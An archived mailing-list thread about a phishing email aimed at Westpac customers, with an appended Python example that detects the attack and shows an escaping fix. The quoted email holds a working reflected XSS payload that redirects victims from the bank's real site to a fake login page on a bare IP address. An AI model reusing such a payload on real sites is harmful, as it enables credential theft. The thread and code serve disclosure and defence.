[LINK] Phishing plumbs new depths for Westpac Customers: XSS
Roger Clarke
Roger.Clarke at xamax.com.au
Tue Nov 21 12:18:44 AEDT 2006
Rick, please send this in the form of a complaint to:
- the Privacy Commissioner
- the ABA
- AGIMO
- AusCERT
Sure, they'll all fall over backwards flick-passing it to one
another. But there's a lot of nervousness in the Internet Banking
security arena at present, and your good, solid detail could really
hit the spot.
Make sure they understand that there are *two* incident reports in one:
- the new form of phish
- the completely inadequate incident reporting mechanism
You could also draw attention to the complaints-handling standards:
AS 4269:1995
ISO 10002:2004
At grave risk of telling you how to suck eggs:
http://www.privacy.org.au/Resources/Complaints.html
At 11:02 +1100 21/11/06, Rick Welykochy wrote:
>Just ran across this attempt at phishing for my Westpac username and password:
>(snipped from the phishing email)
>
>
> Westpac Banking
>
> No additional action is required by you to continue to
> use your online services.
>
> To review the changes [to Terms and Conditions], click on the link below:
>
>and here is the link:
>
> https://www.westpac.com.au/forms/AskWestpac.nsf/
> f_askWestpac?OpenForm&refTitle=<script>document.location=
> 'http://203.144.80.87/manual/.modonline/new.html'</script>
>
>I broke up the link into 3 parts for readability. The link does actually
>look valid, it takes you to the Westpac secure web site, but then the
>XSS (cross-site scripting) redirects you to a fake login page at
>http://203.144.80.87/manual/.modonline/new.html.
>
>Try http://tinyurl.com/tksrx if you wish to see it in action.
>
>I'm afraid this one might catch all but the technically savvy amongst us.
>
>Westpac has been contacted about this. Unfortunately, their website has web-based
>forms only for email and no interface is provided to alert their IT staff to
>the existence of such a hoax as the one above. I had to submit the email and
>further details via a pitifully inadequate web form. I have my doubts as to
>how far into the system my alert will survive. And I note with some annoyance that
>the link for actual feedback does not work (never returns a page) so I had to
>use a far less appropriate page.
>
>The page that would not respond to my browser is here:
>http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
>Can other Linkers actually see this page? I cannot, neither with Firefox
>nor with Safari.
>
>cheers
>rickw
>
>--
>_________________________________
>Rick Welykochy || Praxis Services
>
>Welcome to the department of redundancy department.
>
>_______________________________________________
>Link mailing list
>Link at mailman.anu.edu.au
>http://mailman.anu.edu.au/mailman/listinfo/link
--
Roger Clarke http://www.anu.edu.au/people/Roger.Clarke/
Xamax Consultancy Pty Ltd 78 Sidaway St, Chapman ACT 2611 AUSTRALIA
Tel: +61 2 6288 1472, and 6288 6916
mailto:Roger.Clarke at xamax.com.au http://www.xamax.com.au/
Visiting Professor in Info Science & Eng Australian National University
Visiting Professor in the eCommerce Program University of Hong Kong
Visiting Professor in the Cyberspace Law & Policy Centre Uni of NSW
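The link Rick quotes is worth taking apart, because it shows why a hostname check alone is not enough: the URL really does point at www.westpac.com.au, and only the refTitle query parameter carries the payload. The Python below is an added example for this thread, not Westpac's code or anything from the Link list. The two render functions are a hypothetical stand-in for whatever the AskWestpac.nsf form did with refTitle (one echoes it raw, one HTML-escapes it), and the two checks are the kind of thing a mail filter or incident handler could run over a reported link: flag parameters that carry a script tag, and pull out the redirect target so the off-domain IP address stands out. The URL constant is the quoted link rejoined, with the IP exactly as it appears in the mail.

```python
"""Reflected XSS used as a phishing redirector (added example, not Westpac code).

The vulnerable/fixed handlers are assumptions about the real form; the URL is the
one quoted in the thread, rejoined into a single string.
"""
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed from the link quoted in the mail (split into 3 parts there for readability).
PHISH_URL = (
    "https://www.westpac.com.au/forms/AskWestpac.nsf/"
    "f_askWestpac?OpenForm&refTitle=<script>document.location="
    "'http://203.144.80.87/manual/.modonline/new.html'</script>"
)

GENUINE_HOST = "www.westpac.com.au"

# Matches an opening <script> tag, tolerating whitespace and mixed case.
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)
# Matches document.location = '...' / window.location.href = "..." assignments.
LOCATION_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
)


def render_vulnerable(ref_title: str) -> str:
    """Hypothetical form handler that reflects refTitle into the page unchanged."""
    return f"<h1>Ask Westpac: {ref_title}</h1>"


def render_fixed(ref_title: str) -> str:
    """Same handler, but the parameter is HTML-escaped before it is reflected,
    so the browser sees text, not markup."""
    return f"<h1>Ask Westpac: {html.escape(ref_title, quote=True)}</h1>"


def query_params(url: str) -> dict:
    """Decoded query parameters of url (bare flags such as OpenForm map to '')."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def suspicious_params(url: str) -> list:
    """Names of query parameters whose decoded value contains a <script> tag.
    Catches a link whose host is genuine but whose query is not."""
    return [
        name
        for name, value in query_params(url).items()
        if SCRIPT_RE.search(unquote(value))
    ]


def redirect_target(url: str):
    """URL the injected script would send the victim to, or None if no
    location assignment is present in any parameter."""
    for value in query_params(url).values():
        match = LOCATION_RE.search(unquote(value))
        if match:
            return match.group(1)
    return None


def classify(url: str) -> str:
    """Verdict for a reported link: 'clean', or 'xss-redirect' with the off-site
    destination when a genuine-looking host carries a script that leaves it."""
    if not suspicious_params(url):
        return "clean"
    target = redirect_target(url)
    if target and urlsplit(target).hostname != GENUINE_HOST:
        return f"xss-redirect to {urlsplit(target).hostname}"
    return "xss"


if __name__ == "__main__":
    payload = query_params(PHISH_URL)["refTitle"]
    print("host looks genuine:", urlsplit(PHISH_URL).hostname == GENUINE_HOST)
    print("vulnerable:", render_vulnerable(payload))
    print("fixed:     ", render_fixed(payload))
    print("verdict:   ", classify(PHISH_URL))
```

The point of `classify` is that the hostname check passes on its own (which is exactly why the link "does actually look valid"); only by looking inside the query value do you see the script, and only by extracting the assigned location do you see that the victim ends up on a bare IP address rather than on a Westpac host.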